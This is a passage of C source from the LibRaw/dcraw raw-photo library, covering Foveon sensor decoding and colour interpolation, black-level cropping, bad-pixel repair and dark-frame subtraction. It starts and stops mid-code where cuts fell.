read_shorts ((ushort *) diff, 1024);
if (!load_flags) foveon_decoder (1024, 0);
for (row=0; row < height; row++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
memset (pred, 0, sizeof pred);
if (!bit && !load_flags && atoi(model+2) < 14) get4();
for (col=bit=0; col < width; col++) {
if (load_flags) {
bitbuf = get4();
FORC3 pred[2-c] += diff[bitbuf >> c*10 & 0x3ff];
}
else FORC3 {
for (dindex=first_decode; dindex->branch[0]; ) {
if ((bit = (bit-1) & 31) == 31)
for (i=0; i < 4; i++)
bitbuf = (bitbuf << 8) + fgetc(ifp);
dindex = dindex->branch[bitbuf >> bit & 1];
}
pred[c] += diff[dindex->leaf];
if (pred[c] >> 16 && ~pred[c] >> 16) derror();
}
FORC3 image[row*width+col][c] = pred[c];
}
}
}
void CLASS foveon_huff (ushort *huff)
{
int i, j, clen, code;
huff[0] = 8;
for (i=0; i < 13; i++) {
clen = getc(ifp);
code = getc(ifp);
for (j=0; j < 256 >> clen; )
huff[code+ ++j] = clen << 8 | i;
}
get2();
}
void CLASS foveon_dp_load_raw()
{
#ifdef LIBRAW_LIBRARY_BUILD
if(!image)
throw LIBRAW_EXCEPTION_IO_CORRUPT;
#endif
unsigned c, roff[4], row, col, diff;
ushort huff[512], vpred[2][2], hpred[2];
fseek (ifp, 8, SEEK_CUR);
foveon_huff (huff);
roff[0] = 48;
FORC3 roff[c+1] = -(-(roff[c] + get4()) & -16);
FORC3 {
fseek (ifp, data_offset+roff[c], SEEK_SET);
getbits(-1);
vpred[0][0] = vpred[0][1] = vpred[1][0] = vpred[1][1] = 512;
for (row=0; row < height; row++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
for (col=0; col < width; col++) {
diff = ljpeg_diff(huff);
if (col < 2) hpred[col] = vpred[row & 1][col] += diff;
else hpred[col & 1] += diff;
image[row*width+col][c] = hpred[col & 1];
}
}
}
}
void CLASS foveon_load_camf()
{
unsigned type, wide, high, i, j, row, col, diff;
ushort huff[258], vpred[2][2] = {{512,512},{512,512}}, hpred[2];
fseek (ifp, meta_offset, SEEK_SET);
type = get4(); get4(); get4();
wide = get4();
high = get4();
if (type == 2) {
fread (meta_data, 1, meta_length, ifp);
for (i=0; i < meta_length; i++) {
high = (high * 1597 + 51749) % 244944;
wide = high * (INT64) 301593171 >> 24;
meta_data[i] ^= ((((high << 8) - wide) >> 1) + wide) >> 17;
}
} else if (type == 4) {
free (meta_data);
meta_data = (char *) malloc (meta_length = wide*high*3/2);
merror (meta_data, "foveon_load_camf()");
foveon_huff (huff);
get4();
getbits(-1);
for (j=row=0; row < high; row++) {
for (col=0; col < wide; col++) {
diff = ljpeg_diff(huff);
if (col < 2) hpred[col] = vpred[row & 1][col] += diff;
else hpred[col & 1] += diff;
if (col & 1) {
meta_data[j++] = hpred[0] >> 4;
meta_data[j++] = hpred[0] << 4 | hpred[1] >> 8;
meta_data[j++] = hpred[1];
}
}
}
}
#ifdef DCRAW_VERBOSE
else
fprintf (stderr,_("%s has unknown CAMF type %d.\n"), ifname, type);
#endif
}
const char * CLASS foveon_camf_param (const char *block, const char *param)
{
unsigned idx, num;
char *pos, *cp, *dp;
for (idx=0; idx < meta_length; idx += sget4(pos+8)) {
pos = meta_data + idx;
if (strncmp (pos, "CMb", 3)) break;
if (pos[3] != 'P') continue;
if (strcmp (block, pos+sget4(pos+12))) continue;
cp = pos + sget4(pos+16);
num = sget4(cp);
dp = pos + sget4(cp+4);
while (num--) {
cp += 8;
if (!strcmp (param, dp+sget4(cp)))
return dp+sget4(cp+4);
}
}
return 0;
}
void * CLASS foveon_camf_matrix (unsigned dim[3], const char *name)
{
unsigned i, idx, type, ndim, size, *mat;
char *pos, *cp, *dp;
double dsize;
for (idx=0; idx < meta_length; idx += sget4(pos+8)) {
pos = meta_data + idx;
if (strncmp (pos, "CMb", 3)) break;
if (pos[3] != 'M') continue;
if (strcmp (name, pos+sget4(pos+12))) continue;
dim[0] = dim[1] = dim[2] = 1;
cp = pos + sget4(pos+16);
type = sget4(cp);
if ((ndim = sget4(cp+4)) > 3) break;
dp = pos + sget4(cp+8);
for (i=ndim; i--; ) {
cp += 12;
dim[i] = sget4(cp);
}
if ((dsize = (double) dim[0]*dim[1]*dim[2]) > meta_length/4) break;
mat = (unsigned *) malloc ((size = dsize) * 4);
merror (mat, "foveon_camf_matrix()");
for (i=0; i < size; i++)
if (type && type != 6)
mat[i] = sget4(dp + i*4);
else
mat[i] = sget4(dp + i*2) & 0xffff;
return mat;
}
#ifdef DCRAW_VERBOSE
fprintf (stderr,_("%s: \"%s\" matrix not found!\n"), ifname, name);
#endif
return 0;
}
int CLASS foveon_fixed (void *ptr, int size, const char *name)
{
void *dp;
unsigned dim[3];
if (!name) return 0;
dp = foveon_camf_matrix (dim, name);
if (!dp) return 0;
memcpy (ptr, dp, size*4);
free (dp);
return 1;
}
float CLASS foveon_avg (short *pix, int range[2], float cfilt)
{
int i;
float val, min=FLT_MAX, max=-FLT_MAX, sum=0;
for (i=range[0]; i <= range[1]; i++) {
sum += val = pix[i*4] + (pix[i*4]-pix[(i-1)*4]) * cfilt;
if (min > val) min = val;
if (max < val) max = val;
}
if (range[1] - range[0] == 1) return sum/2;
return (sum - min - max) / (range[1] - range[0] - 1);
}
short * CLASS foveon_make_curve (double max, double mul, double filt)
{
short *curve;
unsigned i, size;
double x;
if (!filt) filt = 0.8;
size = 4*M_PI*max / filt;
if (size == UINT_MAX) size--;
curve = (short *) calloc (size+1, sizeof *curve);
merror (curve, "foveon_make_curve()");
curve[0] = size;
for (i=0; i < size; i++) {
x = i*filt/max/4;
curve[i+1] = (cos(x)+1)/2 * tanh(i*filt/mul) * mul + 0.5;
}
return curve;
}
void CLASS foveon_make_curves
(short **curvep, float dq[3], float div[3], float filt)
{
double mul[3], max=0;
int c;
FORC3 mul[c] = dq[c]/div[c];
FORC3 if (max < mul[c]) max = mul[c];
FORC3 curvep[c] = foveon_make_curve (max, mul[c], filt);
}
int CLASS foveon_apply_curve (short *curve, int i)
{
if (abs(i) >= curve[0]) return 0;
return i < 0 ? -curve[1-i] : curve[1+i];
}
#define image ((short (*)[4]) image)
void CLASS foveon_interpolate()
{
static const short hood[] = { -1,-1, -1,0, -1,1, 0,-1, 0,1, 1,-1, 1,0, 1,1 };
short *pix, prev[3], *curve[8], (*shrink)[3];
float cfilt=0, ddft[3][3][2], ppm[3][3][3];
float cam_xyz[3][3], correct[3][3], last[3][3], trans[3][3];
float chroma_dq[3], color_dq[3], diag[3][3], div[3];
float (*black)[3], (*sgain)[3], (*sgrow)[3];
float fsum[3], val, frow, num;
int row, col, c, i, j, diff, sgx, irow, sum, min, max, limit;
int dscr[2][2], dstb[4], (*smrow[7])[3], total[4], ipix[3];
int work[3][3], smlast, smred, smred_p=0, dev[3];
int satlev[3], keep[4], active[4];
unsigned dim[3], *badpix;
double dsum=0, trsum[3];
char str[128];
const char* cp;
#ifdef DCRAW_VERBOSE
if (verbose)
fprintf (stderr,_("Foveon interpolation...\n"));
#endif
foveon_load_camf();
foveon_fixed (dscr, 4, "DarkShieldColRange");
foveon_fixed (ppm[0][0], 27, "PostPolyMatrix");
foveon_fixed (satlev, 3, "SaturationLevel");
foveon_fixed (keep, 4, "KeepImageArea");
foveon_fixed (active, 4, "ActiveImageArea");
foveon_fixed (chroma_dq, 3, "ChromaDQ");
foveon_fixed (color_dq, 3,
foveon_camf_param ("IncludeBlocks", "ColorDQ") ?
"ColorDQ" : "ColorDQCamRGB");
if (foveon_camf_param ("IncludeBlocks", "ColumnFilter"))
foveon_fixed (&cfilt, 1, "ColumnFilter");
memset (ddft, 0, sizeof ddft);
if (!foveon_camf_param ("IncludeBlocks", "DarkDrift")
|| !foveon_fixed (ddft[1][0], 12, "DarkDrift"))
for (i=0; i < 2; i++) {
foveon_fixed (dstb, 4, i ? "DarkShieldBottom":"DarkShieldTop");
for (row = dstb[1]; row <= dstb[3]; row++)
for (col = dstb[0]; col <= dstb[2]; col++)
FORC3 ddft[i+1][c][1] += (short) image[row*width+col][c];
FORC3 ddft[i+1][c][1] /= (dstb[3]-dstb[1]+1) * (dstb[2]-dstb[0]+1);
}
if (!(cp = foveon_camf_param ("WhiteBalanceIlluminants", model2)))
{
#ifdef DCRAW_VERBOSE
fprintf (stderr,_("%s: Invalid white balance \"%s\"\n"), ifname, model2);
#endif
return; }
foveon_fixed (cam_xyz, 9, cp);
foveon_fixed (correct, 9,
foveon_camf_param ("WhiteBalanceCorrections", model2));
memset (last, 0, sizeof last);
for (i=0; i < 3; i++)
for (j=0; j < 3; j++)
FORC3 last[i][j] += correct[i][c] * cam_xyz[c][j];
#define LAST(x,y) last[(i+x)%3][(c+y)%3]
for (i=0; i < 3; i++)
FORC3 diag[c][i] = LAST(1,1)*LAST(2,2) - LAST(1,2)*LAST(2,1);
#undef LAST
FORC3 div[c] = diag[c][0]*0.3127 + diag[c][1]*0.329 + diag[c][2]*0.3583;
sprintf (str, "%sRGBNeutral", model2);
if (foveon_camf_param ("IncludeBlocks", str))
foveon_fixed (div, 3, str);
num = 0;
FORC3 if (num < div[c]) num = div[c];
FORC3 div[c] /= num;
memset (trans, 0, sizeof trans);
for (i=0; i < 3; i++)
for (j=0; j < 3; j++)
FORC3 trans[i][j] += rgb_cam[i][c] * last[c][j] * div[j];
FORC3 trsum[c] = trans[c][0] + trans[c][1] + trans[c][2];
dsum = (6*trsum[0] + 11*trsum[1] + 3*trsum[2]) / 20;
for (i=0; i < 3; i++)
FORC3 last[i][c] = trans[i][c] * dsum / trsum[i];
memset (trans, 0, sizeof trans);
for (i=0; i < 3; i++)
for (j=0; j < 3; j++)
FORC3 trans[i][j] += (i==c ? 32 : -1) * last[c][j] / 30;
foveon_make_curves (curve, color_dq, div, cfilt);
FORC3 chroma_dq[c] /= 3;
foveon_make_curves (curve+3, chroma_dq, div, cfilt);
FORC3 dsum += chroma_dq[c] / div[c];
curve[6] = foveon_make_curve (dsum, dsum, cfilt);
curve[7] = foveon_make_curve (dsum*2, dsum*2, cfilt);
sgain = (float (*)[3]) foveon_camf_matrix (dim, "SpatialGain");
if (!sgain) return;
sgrow = (float (*)[3]) calloc (dim[1], sizeof *sgrow);
sgx = (width + dim[1]-2) / (dim[1]-1);
black = (float (*)[3]) calloc (height, sizeof *black);
for (row=0; row < height; row++) {
for (i=0; i < 6; i++)
((float *)ddft[0])[i] = ((float *)ddft[1])[i] +
row / (height-1.0) * (((float *)ddft[2])[i] - ((float *)ddft[1])[i]);
FORC3 black[row][c] =
( foveon_avg (image[row*width]+c, dscr[0], cfilt) +
foveon_avg (image[row*width]+c, dscr[1], cfilt) * 3
- ddft[0][c][0] ) / 4 - ddft[0][c][1];
}
memcpy (black, black+8, sizeof *black*8);
memcpy (black+height-11, black+height-22, 11*sizeof *black);
memcpy (last, black, sizeof last);
for (row=1; row < height-1; row++) {
FORC3 if (last[1][c] > last[0][c]) {
if (last[1][c] > last[2][c])
black[row][c] = (last[0][c] > last[2][c]) ? last[0][c]:last[2][c];
} else
if (last[1][c] < last[2][c])
black[row][c] = (last[0][c] < last[2][c]) ? last[0][c]:last[2][c];
memmove (last, last+1, 2*sizeof last[0]);
memcpy (last[2], black[row+1], sizeof last[2]);
}
FORC3 black[row][c] = (last[0][c] + last[1][c])/2;
FORC3 black[0][c] = (black[1][c] + black[3][c])/2;
val = 1 - exp(-1/24.0);
memcpy (fsum, black, sizeof fsum);
for (row=1; row < height; row++)
FORC3 fsum[c] += black[row][c] =
(black[row][c] - black[row-1][c])*val + black[row-1][c];
memcpy (last[0], black[height-1], sizeof last[0]);
FORC3 fsum[c] /= height;
for (row = height; row--; )
FORC3 last[0][c] = black[row][c] =
(black[row][c] - fsum[c] - last[0][c])*val + last[0][c];
memset (total, 0, sizeof total);
for (row=2; row < height; row+=4)
for (col=2; col < width; col+=4) {
FORC3 total[c] += (short) image[row*width+col][c];
total[3]++;
}
for (row=0; row < height; row++)
FORC3 black[row][c] += fsum[c]/2 + total[c]/(total[3]*100.0);
for (row=0; row < height; row++) {
for (i=0; i < 6; i++)
((float *)ddft[0])[i] = ((float *)ddft[1])[i] +
row / (height-1.0) * (((float *)ddft[2])[i] - ((float *)ddft[1])[i]);
pix = image[row*width];
memcpy (prev, pix, sizeof prev);
frow = row / (height-1.0) * (dim[2]-1);
if ((irow = frow) == dim[2]-1) irow--;
frow -= irow;
for (i=0; i < dim[1]; i++)
FORC3 sgrow[i][c] = sgain[ irow *dim[1]+i][c] * (1-frow) +
sgain[(irow+1)*dim[1]+i][c] * frow;
for (col=0; col < width; col++) {
FORC3 {
diff = pix[c] - prev[c];
prev[c] = pix[c];
ipix[c] = pix[c] + floor ((diff + (diff*diff >> 14)) * cfilt
- ddft[0][c][1] - ddft[0][c][0] * ((float) col/width - 0.5)
- black[row][c] );
}
FORC3 {
work[0][c] = ipix[c] * ipix[c] >> 14;
work[2][c] = ipix[c] * work[0][c] >> 14;
work[1][2-c] = ipix[(c+1) % 3] * ipix[(c+2) % 3] >> 14;
}
FORC3 {
for (val=i=0; i < 3; i++)
for ( j=0; j < 3; j++)
val += ppm[c][i][j] * work[i][j];
ipix[c] = floor ((ipix[c] + floor(val)) *
( sgrow[col/sgx ][c] * (sgx - col%sgx) +
sgrow[col/sgx+1][c] * (col%sgx) ) / sgx / div[c]);
if (ipix[c] > 32000) ipix[c] = 32000;
pix[c] = ipix[c];
}
pix += 4;
}
}
free (black);
free (sgrow);
free (sgain);
if ((badpix = (unsigned *) foveon_camf_matrix (dim, "BadPixels"))) {
for (i=0; i < dim[0]; i++) {
col = (badpix[i] >> 8 & 0xfff) - keep[0];
row = (badpix[i] >> 20 ) - keep[1];
if ((unsigned)(row-1) > height-3 || (unsigned)(col-1) > width-3)
continue;
memset (fsum, 0, sizeof fsum);
for (sum=j=0; j < 8; j++)
if (badpix[i] & (1 << j)) {
FORC3 fsum[c] += (short)
image[(row+hood[j*2])*width+col+hood[j*2+1]][c];
sum++;
}
if (sum) FORC3 image[row*width+col][c] = fsum[c]/sum;
}
free (badpix);
}
/* Array for 5x5 Gaussian averaging of red values */
smrow[6] = (int (*)[3]) calloc (width*5, sizeof **smrow);
merror (smrow[6], "foveon_interpolate()");
for (i=0; i < 5; i++)
smrow[i] = smrow[6] + i*width;
/* Sharpen the reds against these Gaussian averages */
for (smlast=-1, row=2; row < height-2; row++) {
while (smlast < row+2) {
for (i=0; i < 6; i++)
smrow[(i+5) % 6] = smrow[i];
pix = image[++smlast*width+2];
for (col=2; col < width-2; col++) {
smrow[4][col][0] =
(pix[0]*6 + (pix[-4]+pix[4])*4 + pix[-8]+pix[8] + 8) >> 4;
pix += 4;
}
}
pix = image[row*width+2];
for (col=2; col < width-2; col++) {
smred = ( 6 * smrow[2][col][0]
+ 4 * (smrow[1][col][0] + smrow[3][col][0])
+ smrow[0][col][0] + smrow[4][col][0] + 8 ) >> 4;
if (col == 2)
smred_p = smred;
i = pix[0] + ((pix[0] - ((smred*7 + smred_p) >> 3)) >> 3);
if (i > 32000) i = 32000;
pix[0] = i;
smred_p = smred;
pix += 4;
}
}
/* Adjust the brighter pixels for better linearity */
min = 0xffff;
FORC3 {
i = satlev[c] / div[c];
if (min > i) min = i;
}
limit = min * 9 >> 4;
for (pix=image[0]; pix < image[height*width]; pix+=4) {
if (pix[0] <= limit || pix[1] <= limit || pix[2] <= limit)
continue;
min = max = pix[0];
for (c=1; c < 3; c++) {
if (min > pix[c]) min = pix[c];
if (max < pix[c]) max = pix[c];
}
if (min >= limit*2) {
pix[0] = pix[1] = pix[2] = max;
} else {
i = 0x4000 - ((min - limit) << 14) / limit;
i = 0x4000 - (i*i >> 14);
i = i*i >> 14;
FORC3 pix[c] += (max - pix[c]) * i >> 14;
}
}
/*
Because photons that miss one detector often hit another,
the sum R+G+B is much less noisy than the individual colors.
So smooth the hues without smoothing the total.
*/
for (smlast=-1, row=2; row < height-2; row++) {
while (smlast < row+2) {
for (i=0; i < 6; i++)
smrow[(i+5) % 6] = smrow[i];
pix = image[++smlast*width+2];
for (col=2; col < width-2; col++) {
FORC3 smrow[4][col][c] = (pix[c-4]+2*pix[c]+pix[c+4]+2) >> 2;
pix += 4;
}
}
pix = image[row*width+2];
for (col=2; col < width-2; col++) {
FORC3 dev[c] = -foveon_apply_curve (curve[7], pix[c] -
((smrow[1][col][c] + 2*smrow[2][col][c] + smrow[3][col][c]) >> 2));
sum = (dev[0] + dev[1] + dev[2]) >> 3;
FORC3 pix[c] += dev[c] - sum;
pix += 4;
}
}
for (smlast=-1, row=2; row < height-2; row++) {
while (smlast < row+2) {
for (i=0; i < 6; i++)
smrow[(i+5) % 6] = smrow[i];
pix = image[++smlast*width+2];
for (col=2; col < width-2; col++) {
FORC3 smrow[4][col][c] =
(pix[c-8]+pix[c-4]+pix[c]+pix[c+4]+pix[c+8]+2) >> 2;
pix += 4;
}
}
pix = image[row*width+2];
for (col=2; col < width-2; col++) {
for (total[3]=375, sum=60, c=0; c < 3; c++) {
for (total[c]=i=0; i < 5; i++)
total[c] += smrow[i][col][c];
total[3] += total[c];
sum += pix[c];
}
if (sum < 0) sum = 0;
j = total[3] > 375 ? (sum << 16) / total[3] : sum * 174;
FORC3 pix[c] += foveon_apply_curve (curve[6],
((j*total[c] + 0x8000) >> 16) - pix[c]);
pix += 4;
}
}
/* Transform the image to a different colorspace */
for (pix=image[0]; pix < image[height*width]; pix+=4) {
FORC3 pix[c] -= foveon_apply_curve (curve[c], pix[c]);
sum = (pix[0]+pix[1]+pix[1]+pix[2]) >> 2;
FORC3 pix[c] -= foveon_apply_curve (curve[c], pix[c]-sum);
FORC3 {
for (dsum=i=0; i < 3; i++)
dsum += trans[c][i] * pix[i];
if (dsum < 0) dsum = 0;
if (dsum > 24000) dsum = 24000;
ipix[c] = dsum + 0.5;
}
FORC3 pix[c] = ipix[c];
}
/* Smooth the image bottom-to-top and save at 1/4 scale */
shrink = (short (*)[3]) calloc ((height/4), (width/4)*sizeof *shrink);
merror (shrink, "foveon_interpolate()");
for (row = height/4; row--; )
for (col=0; col < width/4; col++) {
ipix[0] = ipix[1] = ipix[2] = 0;
for (i=0; i < 4; i++)
for (j=0; j < 4; j++)
FORC3 ipix[c] += image[(row*4+i)*width+col*4+j][c];
FORC3
if (row+2 > height/4)
shrink[row*(width/4)+col][c] = ipix[c] >> 4;
else
shrink[row*(width/4)+col][c] =
(shrink[(row+1)*(width/4)+col][c]*1840 + ipix[c]*141 + 2048) >> 12;
}
/* From the 1/4-scale image, smooth right-to-left */
for (row=0; row < (height & ~3); row++) {
ipix[0] = ipix[1] = ipix[2] = 0;
if ((row & 3) == 0)
for (col = width & ~3 ; col--; )
FORC3 smrow[0][col][c] = ipix[c] =
(shrink[(row/4)*(width/4)+col/4][c]*1485 + ipix[c]*6707 + 4096) >> 13;
/* Then smooth left-to-right */
ipix[0] = ipix[1] = ipix[2] = 0;
for (col=0; col < (width & ~3); col++)
FORC3 smrow[1][col][c] = ipix[c] =
(smrow[0][col][c]*1485 + ipix[c]*6707 + 4096) >> 13;
/* Smooth top-to-bottom */
if (row == 0)
memcpy (smrow[2], smrow[1], sizeof **smrow * width);
else
for (col=0; col < (width & ~3); col++)
FORC3 smrow[2][col][c] =
(smrow[2][col][c]*6707 + smrow[1][col][c]*1485 + 4096) >> 13;
/* Adjust the chroma toward the smooth values */
for (col=0; col < (width & ~3); col++) {
for (i=j=30, c=0; c < 3; c++) {
i += smrow[2][col][c];
j += image[row*width+col][c];
}
j = (j << 16) / i;
for (sum=c=0; c < 3; c++) {
ipix[c] = foveon_apply_curve (curve[c+3],
((smrow[2][col][c] * j + 0x8000) >> 16) - image[row*width+col][c]);
sum += ipix[c];
}
sum >>= 3;
FORC3 {
i = image[row*width+col][c] + ipix[c] - sum;
if (i < 0) i = 0;
image[row*width+col][c] = i;
}
}
}
free (shrink);
free (smrow[6]);
for (i=0; i < 8; i++)
free (curve[i]);
/* Trim off the black border */
active[1] -= keep[1];
active[3] -= 2;
i = active[2] - active[0];
for (row=0; row < active[3]-active[1]; row++)
memcpy (image[row*i], image[(row+active[1])*width+active[0]],
i * sizeof *image);
width = i;
height = row;
}
#undef image
/* RESTRICTED code ends here */
//@out COMMON
void CLASS crop_masked_pixels()
{
int row, col;
unsigned
#ifndef LIBRAW_LIBRARY_BUILD
r, raw_pitch = raw_width*2,
c, m, mblack[8], zero, val;
#else
c, m, zero, val;
#define mblack imgdata.color.black_stat
#endif
#ifndef LIBRAW_LIBRARY_BUILD
if (load_raw == &CLASS phase_one_load_raw ||
load_raw == &CLASS phase_one_load_raw_c)
phase_one_correct();
if (fuji_width) {
for (row=0; row < raw_height-top_margin*2; row++) {
for (col=0; col < fuji_width << !fuji_layout; col++) {
if (fuji_layout) {
r = fuji_width - 1 - col + (row >> 1);
c = col + ((row+1) >> 1);
} else {
r = fuji_width - 1 + row - (col >> 1);
c = row + ((col+1) >> 1);
}
if (r < height && c < width)
BAYER(r,c) = RAW(row+top_margin,col+left_margin);
}
}
} else {
for (row=0; row < height; row++)
for (col=0; col < width; col++)
BAYER2(row,col) = RAW(row+top_margin,col+left_margin);
}
#endif
if (mask[0][3] > 0) goto mask_set;
if (load_raw == &CLASS canon_load_raw ||
load_raw == &CLASS lossless_jpeg_load_raw) {
mask[0][1] = mask[1][1] += 2;
mask[0][3] -= 2;
goto sides;
}
if (load_raw == &CLASS canon_600_load_raw ||
load_raw == &CLASS sony_load_raw ||
(load_raw == &CLASS eight_bit_load_raw && strncmp(model,"DC2",3)) ||
load_raw == &CLASS kodak_262_load_raw ||
(load_raw == &CLASS packed_load_raw && (load_flags & 32))) {
sides:
mask[0][0] = mask[1][0] = top_margin;
mask[0][2] = mask[1][2] = top_margin+height;
mask[0][3] += left_margin;
mask[1][1] += left_margin+width;
mask[1][3] += raw_width;
}
if (load_raw == &CLASS nokia_load_raw) {
mask[0][2] = top_margin;
mask[0][3] = width;
}
#ifdef LIBRAW_LIBRARY_BUILD
if (load_raw == &CLASS broadcom_load_raw) {
mask[0][2] = top_margin;
mask[0][3] = width;
}
#endif
mask_set:
memset (mblack, 0, sizeof mblack);
for (zero=m=0; m < 8; m++)
for (row=MAX(mask[m][0],0); row < MIN(mask[m][2],raw_height); row++)
for (col=MAX(mask[m][1],0); col < MIN(mask[m][3],raw_width); col++) {
c = FC(row-top_margin,col-left_margin);
mblack[c] += val = raw_image[(row)*raw_pitch/2+(col)];
mblack[4+c]++;
zero += !val;
}
if (load_raw == &CLASS canon_600_load_raw && width < raw_width) {
black = (mblack[0]+mblack[1]+mblack[2]+mblack[3]) /
(mblack[4]+mblack[5]+mblack[6]+mblack[7]) - 4;
#ifndef LIBRAW_LIBRARY_BUILD
canon_600_correct();
#endif
} else if (zero < mblack[4] && mblack[5] && mblack[6] && mblack[7]) {
FORC4 cblack[c] = mblack[c] / mblack[4+c];
black = cblack[4] = cblack[5] = cblack[6] = 0;
}
}
#ifdef LIBRAW_LIBRARY_BUILD
#undef mblack
#endif
void CLASS remove_zeroes()
{
unsigned row, col, tot, n, r, c;
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_REMOVE_ZEROES,0,2);
#endif
for (row=0; row < height; row++)
for (col=0; col < width; col++)
if (BAYER(row,col) == 0) {
tot = n = 0;
for (r = row-2; r <= row+2; r++)
for (c = col-2; c <= col+2; c++)
if (r < height && c < width &&
FC(r,c) == FC(row,col) && BAYER(r,c))
tot += (n++,BAYER(r,c));
if (n) BAYER(row,col) = tot/n;
}
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_REMOVE_ZEROES,1,2);
#endif
}
//@end COMMON
/* @out FILEIO
#include <math.h>
#define CLASS LibRaw::
#include "libraw/libraw_types.h"
#define LIBRAW_LIBRARY_BUILD
#include "libraw/libraw.h"
#include "internal/defines.h"
#include "internal/var_defines.h"
@end FILEIO */
// @out FILEIO
/*
Seach from the current directory up to the root looking for
a ".badpixels" file, and fix those pixels now.
*/
void CLASS bad_pixels (const char *cfname)
{
FILE *fp=NULL;
#ifndef LIBRAW_LIBRARY_BUILD
char *fname, *cp, line[128];
int len, time, row, col, r, c, rad, tot, n, fixed=0;
#else
char *cp, line[128];
int time, row, col, r, c, rad, tot, n;
#ifdef DCRAW_VERBOSE
int fixed = 0;
#endif
#endif
if (!filters) return;
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_BAD_PIXELS,0,2);
#endif
if (cfname)
fp = fopen (cfname, "r");
// @end FILEIO
else {
for (len=32 ; ; len *= 2) {
fname = (char *) malloc (len);
if (!fname) return;
if (getcwd (fname, len-16)) break;
free (fname);
if (errno != ERANGE) return;
}
#if defined(WIN32) || defined(DJGPP)
if (fname[1] == ':')
memmove (fname, fname+2, len-2);
for (cp=fname; *cp; cp++)
if (*cp == '\\') *cp = '/';
#endif
cp = fname + strlen(fname);
if (cp[-1] == '/') cp--;
while (*fname == '/') {
strcpy (cp, "/.badpixels");
if ((fp = fopen (fname, "r"))) break;
if (cp == fname) break;
while (*--cp != '/');
}
free (fname);
}
// @out FILEIO
if (!fp)
{
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.process_warnings |= LIBRAW_WARN_NO_BADPIXELMAP;
#endif
return;
}
while (fgets (line, 128, fp)) {
cp = strchr (line, '#');
if (cp) *cp = 0;
if (sscanf (line, "%d %d %d", &col, &row, &time) != 3) continue;
if ((unsigned) col >= width || (unsigned) row >= height) continue;
if (time > timestamp) continue;
for (tot=n=0, rad=1; rad < 3 && n==0; rad++)
for (r = row-rad; r <= row+rad; r++)
for (c = col-rad; c <= col+rad; c++)
if ((unsigned) r < height && (unsigned) c < width &&
(r != row || c != col) && fcol(r,c) == fcol(row,col)) {
tot += BAYER2(r,c);
n++;
}
BAYER2(row,col) = tot/n;
#ifdef DCRAW_VERBOSE
if (verbose) {
if (!fixed++)
fprintf (stderr,_("Fixed dead pixels at:"));
fprintf (stderr, " %d,%d", col, row);
}
#endif
}
#ifdef DCRAW_VERBOSE
if (fixed) fputc ('\n', stderr);
#endif
fclose (fp);
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_BAD_PIXELS,1,2);
#endif
}
void CLASS subtract (const char *fname)
{
FILE *fp;
int dim[3]={0,0,0}, comment=0, number=0, error=0, nd=0, c, row, col;
ushort *pixel;
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_DARK_FRAME,0,2);
#endif
if (!(fp = fopen (fname, "rb"))) {
#ifdef DCRAW_VERBOSE
perror (fname);
#endif
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.process_warnings |= LIBRAW_WARN_BAD_DARKFRAME_FILE;
#endif
return;
}
if (fgetc(fp) != 'P' || fgetc(fp) != '5') error = 1;
while (!error && nd < 3 && (c = fgetc(fp)) != EOF) {
if (c == '#') comment = 1;
if (c == '\n') comment = 0;
if (comment) continue;
if (isdigit(c)) number = 1;
if (number) {
if (isdigit(c)) dim[nd] = dim[nd]*10 + c -'0';
else if (isspace(c)) {
number = 0; nd++;
} else error = 1;
}
}
if (error || nd < 3) {
#ifdef DCRAW_VERBOSE
fprintf (stderr,_("%s is not a valid PGM file!\n"), fname);
#endif
fclose (fp); return;
} else if (dim[0] != width || dim[1] != height || dim[2] != 65535) {
#ifdef DCRAW_VERBOSE
fprintf (stderr,_("%s has the wrong dimensions!\n"), fname);
#endif
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.process_warnings |= LIBRAW_WARN_BAD_DARKFRAME_DIM;
#endif
fclose (fp); return;
}
pixel = (ushort *) calloc (width, sizeof *pixel);
merror (pixel, "subtract()");
for (row=0; row < height; row++) {
fread (pixel, 2, width, fp);
for (col=0; col < width; col++)
BAYER(row,col) = MAX (BAYER(row,col) - ntohs(pixel[col]), 0);
}
free (pixel);
fclose (fp);
memset (cblack, 0, sizeof cblack);
black = 0;
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_DARK_FRAME,1,2);
#endif
}
//@end FILEIO
//@out COMMON
static const uchar xlat[2][256] = {
{ 0xc1,0xbf,0x6d,0x0d,0x59,0xc5,0x13,0x9d,0x83,0x61,0x6b,0x4f,0xc7,0x7f,0x3d,0x3d,
0x53,0x59,0xe3,0xc7,0xe9,0x2f,0x95,0xa7,0x95,0x1f,0xdf,0x7f,0x2b,0x29,0xc7,0x0d,
0xdf,0x07,0xef,0x71,0x89,0x3d,0x13,0x3d,0x3b,0x13,0xfb,0x0d,0x89,0xc1,0x65,0x1f,
0xb3,0x0d,0x6b,0x29,0xe3,0xfb,0xef,0xa3,0x6b,0x47,0x7f,0x95,0x35,0xa7,0x47,0x4f,
0xc7,0xf1,0x59,0x95,0x35,0x11,0x29,0x61,0xf1,0x3d,0xb3,0x2b,0x0d,0x43,0x89,0xc1,
0x9d,0x9d,0x89,0x65,0xf1,0xe9,0xdf,0xbf,0x3d,0x7f,0x53,0x97,0xe5,0xe9,0x95,0x17,
0x1d,0x3d,0x8b,0xfb,0xc7,0xe3,0x67,0xa7,0x07,0xf1,0x71,0xa7,0x53,0xb5,0x29,0x89,
0xe5,0x2b,0xa7,0x17,0x29,0xe9,0x4f,0xc5,0x65,0x6d,0x6b,0xef,0x0d,0x89,0x49,0x2f,
0xb3,0x43,0x53,0x65,0x1d,0x49,0xa3,0x13,0x89,0x59,0xef,0x6b,0xef,0x65,0x1d,0x0b,
0x59,0x13,0xe3,0x4f,0x9d,0xb3,0x29,0x43,0x2b,0x07,0x1d,0x95,0x59,0x59,0x47,0xfb,
